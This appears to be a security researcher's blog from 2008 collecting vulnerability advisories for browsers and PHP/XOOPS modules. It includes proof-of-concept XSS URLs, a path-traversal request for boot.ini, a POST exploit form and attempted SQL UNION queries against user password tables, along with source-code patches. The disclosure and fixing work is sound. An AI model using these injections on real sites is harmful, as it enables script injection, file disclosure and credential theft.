Multiple browsers Fake files donwload Cross-site scripting

Thursday, August 28, 2008
Multiple browsers are afected by a issue wen try to download
a fake file, this is a simple study of this situation , and
how to take profit. All Browsers have a little system for
download files, wen we click in a link,and this link go to
a downloable file, the browsers show a dialog to open ,save,
or cancel the download.

Create a fake files with the follows extensions ,exe,com,jar,
bat,pdf,zip,rar,jpg,jpeg,gif,avi,wmv,wma,mpeg, and txt for
example...and inside write a javascript code like
"><script>alert(1)</script> and in the pdf file ,
write before script, the head for a pdf file %PDF- save al
files and create a html with links to fake files,for download it.

Wen we click in some of this links, some browsers fails
to determine what file type it´s and wen the file is open,
the script is executed. I have test it in tree posible
scenarios or i test the security browsers in tree Zones,
with multiple browsers , but the most important are in
the table.

Click In the image to enlarge
The first test is local file (LF) this is wen we use protocol
file:// (ej: file://c:/test/index.html) and the script is runing
with the same rights that the users logged.

The second test is in a intranet server (ID) it´s wen we visit
a page inside our intranet, and The script it´s running in the
context of security of intranet zone.

The third test is in a internet server (RD) it´s when we visit
a page outside our intranet, and The script it´s running in the
context of security ofinternet zone .

Affter test all, the most efective or secure browsers are ,
Mozilla Firefox and Flock browser, because they are non
afeccted by this issue in any zone, and the most insecure
is Avant browser and Maxthon Browser, because they are
vulnerables in the tree zones, this two browsers use explorer
modules, but explorer its vulnerable only in two zones.

This issue can use to execute XSS style attacks.

A malicious user can upload files to server or add downloads
to sites with the link to a fake file and wen a user try to
donwload it , if it navigate with a vulnerable browser in the
Zone, the script is executed with the rights of the affected Zone.

a example with moore comprensive table is available here POC

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....


http://usuarios.lycos.es/reyfuss/browsers/

PopnupBlog index.php multiple variables XSS

Monday, August 25, 2008
##########################################
PopnupBlog index.php multiple variables XSS
Vendor url:http://www.bluemooninc.biz/
Advisore:http://lostmon.blogspot.com/2008/08/
popnupblog-indexphp-multiple-variables.html
Vendor notify:no exploits availables:yes
##########################################

PopnupBlog contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'param' , 'cat_id' and
'view' variables upon submission to 'index.php' script.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

PopnupBlog 3.20 code name: Denali

Prior versions can be vulnerables too.
it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

But you can edit the source code and ix it like:

for fix 'param' open index.php and arround line 37 we have

[code]
$params = PopnupBlogUtils::getDateFromHttpParams();
$start = PopnupBlogUtils::getStartFromHttpParams();
$view = $BlogCNF['default_view'];
$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;
[/code]

add a line to force 'param' to return a integer:

[code]
$_GET['param'] = intval($_GET['param']);
$params = PopnupBlogUtils::getDateFromHttpParams();
$start = PopnupBlogUtils::getStartFromHttpParams();
$view = $BlogCNF['default_view'];
$select_uid = isset($_GET['uid']) ? intval($_GET['uid']) : 0;
[/code]

for fix 'cat_id' and 'view' open index.php and arround line 129 :

[code]
$xoopsTpl->assign('popimg',PopnupBlogUtils::mail_popimg()); // get email
$cat_id=0;
if (isset($_GET['cat_id'])) $cat_id = $_GET['cat_id'];
if (isset($_POST['cat_id'])) $cat_id = $_POST['cat_id'];
$xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start,$cat_id,$select_uid));
if (isset($_GET['view'])) $view = $_GET['view'];
if (isset($_POST['view'])) $view = $_POST['view'];
[/code]

add intval to force variables to return an integer like:

[code]
$xoopsTpl->assign('popimg',PopnupBlogUtils::mail_popimg()); // get email
$cat_id=0;
if (isset($_GET['cat_id'])) $cat_id = intval($_GET['cat_id']);
if (isset($_POST['cat_id'])) $cat_id = intval($_POST['cat_id']);
$xoopsTpl->assign('popnupblog', PopnupBlogUtils::get_blog_list($start,$cat_id,$select_uid));
if (isset($_GET['view'])) $view = intval($_GET['view']);
if (isset($_POST['view'])) $view = intval($_POST['view']);
[/code]

###########
Examples
###########

http://localhost/modules/popnupblog/index.php?param=1
">[XSS-CODE]&start=0,10&cat_id=&view=1

http://localhost/modules/popnupblog/index.php?param=
&start=0,10&cat_id=">[XSS-CODE]&view=1

http://localhost/modules/popnupblog/index.php?param=
&start=0,10&cat_id=&view=1">[XSS-CODE]


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

PHPizabi v0.848b traversal file access

Friday, August 15, 2008
##########################################
PHPizabi v0.848b traversal file access
Vendor url:http://www.phpizabi.net/
Advisore:http://lostmon.blogspot.com/2008/08/
phpizabi-v0848b-traversal-file-access.html
Vendor notify:no exploit available:yes
##########################################

############################
Description By vendor page:
############################

PHPizabi is one of the most powerful social networking
platforms on the planet. With literally thousands of
websites powered by PHPizabi including everything from
simple friends sites to the most complex networking
super sites out there. Easy to install, use, and raising
the bar on what it is to provide a reliable, fast, social
networking package to raise your business to the next level.

##########################
Vulnerability description
##########################
PHPizabi contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'query' variable upon submission
to 'index.php' scripts wen 'L' param is set to 'blogs.search'.
This could allow a remote users to create a specially crafted
URL that would execute '../' directory traversal characters to
view folder files on the target system with the privileges
of the target web service.


#################
Versions
################·

PHPizabi v0.848b C1 HFP3


###################
Solution
###################

At this moment ,no have solution for Traversal vuln.

For solve XSS issue in search blogs update to sp3
of this system:

Download sp3:
http://online.phpizabi.net/distribution/0848bC1_HFP3.zip


###################
Timeline
##################

Dicovered:10-08-2008
vendor notify: 14-08-2008
Vendor response:
Public Disclosure:15-08-2008

###################
Proof of Concept.
###################

#############
XSS
#############

if the sito don´t have instaled 848 Core HotFix Pack 3
(0848bC1_HFP3.zip) this system have one XSS hole in query
variable upon submision to index.php script wen L param is
set to blogs.search:

http://localhost/phpizabi/index.php?L=blogs.search&query=
[XSS-CODE]boolean=or&sin%5B%5D=title&sin
%5B%5D=body&order=natural&direction=asc


#####################
Traversal file access
#####################

For exploit this issue The attacker
need a Admin account.

http://localhost/phpizabi/index.php?L=
admin.templates.edittemplate&id=../../../boot.ini

we can too 'view' the html source code generated by
a remote server like :

http://localhost/phpizabi/index.php?
L=admin.templates.edittemplate
&id=http://[Remote-HOST]/folder/file.php

but i don't know if with this we can do something...


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

FIX XSS in RMSOFT donwload plus

Monday, August 11, 2008
fixing XSS issues in RMSOFT donwload plus


RMSOFT XSS Vulnerability
report:
http://lostmon.blogspot.com/2008/08/rmsoft-downloads-plus-two-scripts-two.html

###################
FIX $key variable
###################

open modules/rmdp/include/rmdp_functions.php

arround line 314 found function rmdp_make_searchnav()

found this code:
#####################
[code]

function rmdp_make_searchnav(){
global $xoopsDB, $xoopsTpl, $xoopsModule;

$xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));
$xoopsTpl->assign('lng_search_button',_RMDP_SEARCH_BUTTON);
$key = isset($_POST['key']) ? $_POST['key'] : (isset($_GET['key']) ?($_GET['key'] : '');

$xoopsTpl->assign('key', $key);
[/code]

the variable $key is vulnerable in GET & POST.
Now add htmlspecialchars() function:
change for this other:

[code]
function rmdp_make_searchnav(){
global $xoopsDB, $xoopsTpl, $xoopsModule;

$xoopsTpl->assign('lng_allweb', sprintf(_RMDP_ALL_WEB, $xoopsModule->getVar('name')));
$xoopsTpl->assign('lng_search_button',_RMDP_SEARCH_BUTTON);
$key = isset($_POST['key']) ? htmlspecialchars($_POST['key']) : (isset($_GET['key']) ? htmlspecialchars($_GET['key']) : '');

$xoopsTpl->assign('key', $key);
[/code]

now variable is clean in functions, but we need to sanitize again in search.php...

open modules/rmdp/search.php

arround line 37 we found two request to $key variable:
[code]
$rmdp_location = 'search';
include('header.php');
$key = $_GET['key'];
if ($key==''){ $key=$_POST['key']; }
$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);
[/code]

need a cleaning :S use again htmlspecialchars() y GET & POST
change by this other:

[code]$rmdp_location = 'search';
include('header.php');
$key = htmlspecialchars($_GET['key']);
if ($key==''){ $key=htmlspecialchars($_POST['key']); }
$cat = isset($_GET['cat']) ? $_GET['cat'] : (isset($_POST['cat']) ? $_POST['cat'] : 0);
[/code]

$cat aparently is sanitized , but if is a numeric value allways i ithink in use intval() like :

[code]
$cat = isset($_GET['cat']) ? intval($_GET['cat']) : (isset($_POST['cat']) ? intval($_POST['cat']) : 0);
[/code]

#############################
fix $id variable in down.php
#############################

open modules/down.php and arround line 38 found this code line:

[code]$id = $_GET['id'];[/code]

it´s a numerical variable value always and them...
yo can change by this other to sanitizing :

[code]$id = intval($_GET['id']);[/code]

##############€nd ######


Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Yogurt Social Network fans.php uid variable XSS

Sunday, August 10, 2008
##########################################
Yogurt Social Network fans.php uid variable XSS
Vendor url:http://sourceforge.net/project/
showfiles.php?group_id=204109
Advisore:http://lostmon.blogspot.com/2008/08/
yogurt-social-network-fansphp-uid.html
Vendor notify:no exploits availables:yes
##########################################


Yogurt Social Network is a social network php/Mysql script
module for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Yogurt Social Network contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'uid' variable upon
submission to Multiple scripts script in yogurt module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

Yogurt Social Network 3.2 rc1

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

###########
Examples
###########

http://localhost/impresscms/htdocs/modules/yogurt/fans.php?
uid=1">[XSS-CODE]

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

RMSOFT Downloads Plus two scripts two variables XSS

Saturday, August 09, 2008
##########################################
RMSOFT Downloads Plus two scripts two variables XSS
Vendor url:http://www.xoops-mexico.net/
Advisore:http://lostmon.blogspot.com/2008/08/
rmsoft-downloads-plus-two-scripts-two.html
Vendor notify:no exploits availables:yes
##########################################


RMSOFT Downloads Plus is a download php/Mysql script
module for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

RMSOFT Downloads Plus contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'key' variable upon
submission to search.php script and 'id' variable upon
submision to down.php script in module. This could allow
a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

RMSOFT Downloads Plus 1.5
RMSOFT Downloads Plus 1.7

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

###########
Examples
###########

http://localhost/modules/rmdp/search.php?key=">[XSS-code]&cat=0

http://localhost/modules/rmdp/down.php?id=1">[XSS-code]

http://localhost/modules/rmdp/down.php?com_mode=nest&com_order=1&id=1">
[XSS-code]&cid=3#users


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente..

Yogurt Social Network multiple scripts uid variable XSS

##########################################
Yogurt Social Network multiple scripts uid variable XSS
Vendor url:http://sourceforge.net/project/
showfiles.php?group_id=204109
Advisore:http://lostmon.blogspot.com/2008/08/
yogurt-social-network-multiple-scripts.html
Vendor notify:no exploits availables:yes
##########################################


Yogurt Social Network is a social network php/Mysql script
module for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Yogurt Social Network contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate 'uid' variable upon
submission to Multiple scripts script in yogurt module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.

##########
versions
##########

Yogurt Social Network 3.2 rc1

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

############
Solution
############

No solution at this time !!!

###########
Examples
###########

http://localhost/impresscms/htdocs/modules/yogurt/friends.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/seutubo.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/album.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/scrapbook.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/index.php?
uid=1"><script>alert(1)</script>

http://localhost/impresscms/htdocs/modules/yogurt/
tribes.php?uid=1"><script>alert(1)</script>

Also the a autenticated user can compose a new scrap with XSS code
in description texarea, and it is executed wen a user looks the
attacker malformed scrap.(stored XSS).


############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

RMSOFT MiniShop module multiple variable XSS

##########################################
RMSOFT MiniShop module multiple variable XSS
Vendor url:http://redmexico.com.mx
Advisore:http://lostmon.blogspot.com/2008/08
/rmsoft-minishop-module-multiple.html
Vendor notify:no exploit available:yes
##########################################


RMSOFT MiniShop is a E-commerce php/Mysql script module
for multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.




RMSOFT MiniShop contains a flaw that allows a remote
cross site scripting attack.This flaw exists because
the application does not validate multiple variable upon
submission to 'search.php' script in RMSOFT MiniShop module.
This could allow a user to create a specially crafted URL
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss ofintegrity.


#################
Versions
################·

RMSOFT MiniShop 1.0

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

###################
Solution
###################

At this moment ,no have solution...



###################
Proof of Concept.
###################

#############
XSS
#############

vulnerable code key & idc variables in lines 35 & 36 in search.php

$key = isset($_GET['key']) ? $_GET['key'] : (isset($_POST['key']) ? $_POST['key'] : '');
$idc = isset($_GET['idc']) ? $_GET['idc'] : (isset($_POST['idc']) ? $_POST['idc'] : '');

to fix change to:

$key = isset($_GET['key']) ? htmlspecialchars($_GET['key']) : (isset($_POST['key']) ? htmlspecialchars($_POST['key']) : '');

$idc = isset($_GET['idc']) ? htmlspecialchars($_GET['idc']) : (isset($_POST['idc']) ? htmlspecialchars($_POST['idc']) : '');

vulnerable code itemsxpag variable in lines 56 to 67 in search.php :

//NUmero de resultados por página
if (isset($_GET['itemsxpag'])){
//setcookie('itemsxpag', $_GET['itemsxpag'], 86400);
$_SESSION['itemsxpag'] = $_GET['itemsxpag'];
$limit = $_GET['itemsxpag'];} else {
$limit = $_SESSION['itemsxpag'];
}if ($limit <= 0){
$limit = $xoopsModuleConfig['cols'] * 3;
$_SESSION['itemsxpag'] = $limit;}


exploit all tree variables:

http://localhost/impresscms/htdocs/modules/rmms/search.php?itemsxpag=4
"><script>alert(1)</script>&Submit=Go%21&idc=0
"><script>alert(2)</script>
&key="><script>alert(3)</script>

This is a persistent script insercion in 'itemsxpag' variable because the value
of the variable is inserted directly in '$_SESION' & '$Limit' variables.:

http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=12"><script>alert(1)</script>&Submit=Go%21&idc=
&key=lalalalalala

try to navigate to index and go again to minishop module
and try to search something in the search box of module.
Wen show the results the script executed before is
executed again.


#####################
Posible SQL Injection
#####################

wen exploit in the example of script insercion
if we look web down we have a SQL Error:

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\">' at line 2

we can try to inject some SQL code like
http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=-1/**/union/**/select/**/pass/**/form/**/x21101_users
/**/LIMIT/**/1&idc=0&key=aaa

http://localhost/impresscms/htdocs/modules/rmms/search.php?
itemsxpag=28+UNION+SELECT+pass+FROM+x21101_users+LIMIT+1
&Submit=Go%21&idc=&key=aaaaaa

and we get this error Incorrect usage of UNION and ORDER BY...

we think in a classic SQL error , but i make several test with
union select and concat , etc etc and don´t have a working exploit
..them this is a unknow impact , and need to patch

############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Kshop module search variable and field remote XSS

Wednesday, August 06, 2008
##########################################
Kshop module search variable&field remote XSS
Vendor url:http://www.kaotik.biz/
Advisore:http://lostmon.blogspot.com/2008/08/
kshop-module-search-variable-and-field.html
Vendor notify:no exploit available:YES
##########################################


Kshop is a E-commerce php/Mysql script module for
multiple CMS Systems like Xoops,e-xoops,bcoos and
impressCMS and probably in all CMS based in Xoops code.

Kshop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the
application does not validate 'Search' variable and
search form field include in this module upon
submission to 'kshop_search.php' script in Kshop module.
This could allow a user to create a specially crafted form
that would execute arbitrary code in a user's browser within
the trust relationship between the browser and the server,
leading loss of integrity.


#################
Versions
################·

Kshop module 2.22

i make a test with ImpressCMS
and this CMS in kshop module
have version 2.23 ????


it´s posible that prior versions
are affected too.

it affects This type CMS Systems if we
have instaled this module:

Xoops
e-xoops
ImpressCMS
Bcoos

and other that uses xoops code and this module.

###################
Solution
###################

At this moment ,no have solution...

but you can make a simple patch ,open kshop_search.php
inside kshop module folder arround line 45 you have
[code]

$xoopsTpl->assign('searchTerm',$_POST['search']);

you can use strip_tags() PHP function , like:

$xoopsTpl->assign('searchTerm',strip_tags($_POST['search']));

now it´s patched , because this remove all tags in the search variable.

or you can use htmlentities() PHP function for patch much more clean like :

$xoopsTpl->assign('searchTerm',htmlentities($_POST['search']));

or ,much moore restrictive:

$xoopsTpl->assign('searchTerm',htmlspecialchars($_POST['search']));

[/code]

Happy patch !!!

###################
Proof of Concept.
###################

This Issue could not exploit directly by URL
because the form field have a limitation of 20 chars
and we need a POST to exploit ,for that we can´t exploit
directly by url because it is a GET and we need a POST.

This is not a problem, we can make a form with the POST
and without any restriction in the form field for Exploit it

put some javascript or html code in the form field

Example: "><script>alert()</script>

its necesary that you put "> before the code.


<form action="http://[victim]/modules/kshop/kshop_search.php" method="POST">

<input type="text" name="search" value="Put your XSS Here !!!">

<input type="image" src="http://www.spymac.com/upload/2007/01/18/OQxsPeTzFN.gif"></form>




############## €nd ###################

Thnx To estrella to be my light
Thnx to all Lostmon Team !
thnx to imydes From www.imydes.com
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...